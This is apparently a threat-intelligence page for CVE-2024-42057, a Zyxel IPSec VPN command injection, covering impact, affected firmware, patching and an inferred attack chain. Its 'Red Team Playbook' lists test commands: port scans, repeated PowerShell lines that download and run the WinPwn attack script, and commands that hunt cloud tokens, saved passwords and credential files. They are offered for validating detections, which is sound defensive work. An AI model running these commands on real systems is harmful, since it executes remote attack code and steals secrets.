CVE-2024-42057
Overview
This vulnerability is a command injection flaw rooted in improper input validation within the IPSec VPN feature of Zyxel ATP series firmware and related products. The issue arises from inadequate sanitization of the username parameter in User-Based-PSK authentication mode, allowing crafted input to be interpreted as OS commands. Affected components include the IPSec VPN authentication mechanism across multiple Zyxel firmware versions.
Vulnerability Description
A command injection vulnerability in the IPSec VPN feature of Zyxel ATP series firmware versions from V4.32 through V5.38, USG FLEX series firmware versions from V4.50 through V5.38, USG FLEX 50(W) series firmware versions from V4.16 through V5.38, and USG20(W)-VPN series firmware versions from V4.16 through V5.38 could allow an unauthenticated attacker to execute some OS commands on an affected device by sending a crafted username to the vulnerable device. Note that this attack could be successful only if the device was configured in User-Based-PSK authentication mode and a valid user with a long username exceeding 28 characters exists.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary OS commands on the affected device by sending a maliciously crafted username, potentially leading to full system compromise. The attack requires network access to the VPN service and the device must be configured in User-Based-PSK mode with a valid user having a username longer than 28 characters. This can result in unauthorized control over the device, data exposure, or disruption of network services. The CVSS vector indicates no privileges or user interaction are required but high attack complexity is present (AV:N/AC:H/PR:N/UI:N).
Solution
Zyxel has released security updates addressing this vulnerability in firmware versions beyond V5.38 for the ATP series and corresponding versions for USG FLEX and USG20(W)-VPN series. Administrators should apply the latest firmware updates as detailed in Zyxel's security advisory dated 09-03-2024 available at https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-multiple-vulnerabilities-in-firewalls-09-03-2024. No specific workarounds are provided; updating to the fixed firmware versions is the recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The command injection vulnerability present in the IPSec VPN feature of specific Zyxel firmware versions poses a significant risk to network security. This vulnerability allows an unauthenticated attacker to execute operating system commands on affected devices by sending a specially crafted username. The exploitation is contingent upon the device being configured in User-Based-PSK authentication mode and the existence of a valid user with a username exceeding 28 characters. This technical flaw highlights a critical weakness in input validation mechanisms, where the system fails to properly sanitize user input, allowing malicious commands to be executed with the privileges of the affected device.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. By crafting a long username that exceeds the specified character limit, an attacker can manipulate the input to execute arbitrary commands on the device. This could be achieved remotely, making it accessible to attackers who may not require physical access to the device. Scenarios could include an attacker probing the network for devices using the vulnerable firmware, identifying those configured with User-Based-PSK authentication, and subsequently launching an attack that could lead to unauthorized access, data exfiltration, or even complete system compromise.
The real-world impact of this vulnerability can be profound, especially for organizations relying on Zyxel devices for secure communications. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and potential breaches of compliance regulations. The business risks associated with such an incident include financial losses, reputational damage, and legal ramifications stemming from data breaches. Furthermore, the ability to execute commands on a device could allow attackers to pivot to other parts of the network, escalating their access and potentially compromising additional systems.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating firmware to the latest versions is crucial, as manufacturers often release patches to address known vulnerabilities. Network monitoring solutions should be employed to detect unusual activity, such as unexpected command executions or anomalous username patterns. Additionally, organizations should enforce strict access controls and authentication mechanisms, ensuring that only authorized users can access sensitive configurations. Conducting regular security assessments and penetration testing can also help identify potential weaknesses before they can be exploited by malicious actors.
In conclusion, the command injection vulnerability in the IPSec VPN feature of Zyxel devices represents a serious threat to network security. The combination of ease of exploitation and significant potential impact necessitates immediate attention from affected organizations. By adopting proactive detection and mitigation strategies, businesses can reduce their risk exposure and safeguard their networks against this and similar vulnerabilities.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-42057, indicating increased attempts to exploit the command injection vulnerability in Zyxel IPSec VPN features. This surge in telemetry suggests that threat actors are actively probing affected devices, likely leveraging the ease of exploitation to gain unauthorized command execution capabilities. Although no new exploit variants or proof-of-concept code have surfaced, the uptick in targeting activity elevates the operational risk for organizations relying on vulnerable Zyxel firmware versions. This development underscores the urgency for defenders to enhance monitoring and incident response readiness, as the vulnerability’s high severity combined with growing exploitation attempts increases the likelihood of successful compromise. While the EPSS score remains stable, the qualitative increase in attack surface activity warrants a reassessment of exposure and prioritization within risk management frameworks.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Zyxel | Zld | All |
cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Zld | All |
cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Zld | All |
cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Zld | All |
cpe:2.3:o:zyxel:zld:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-42057 |
| zyxel.com |
GitHub CVE
vendor-advisory
|
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-multiple-vulnerabilities-in-firewalls-09-03-2024 |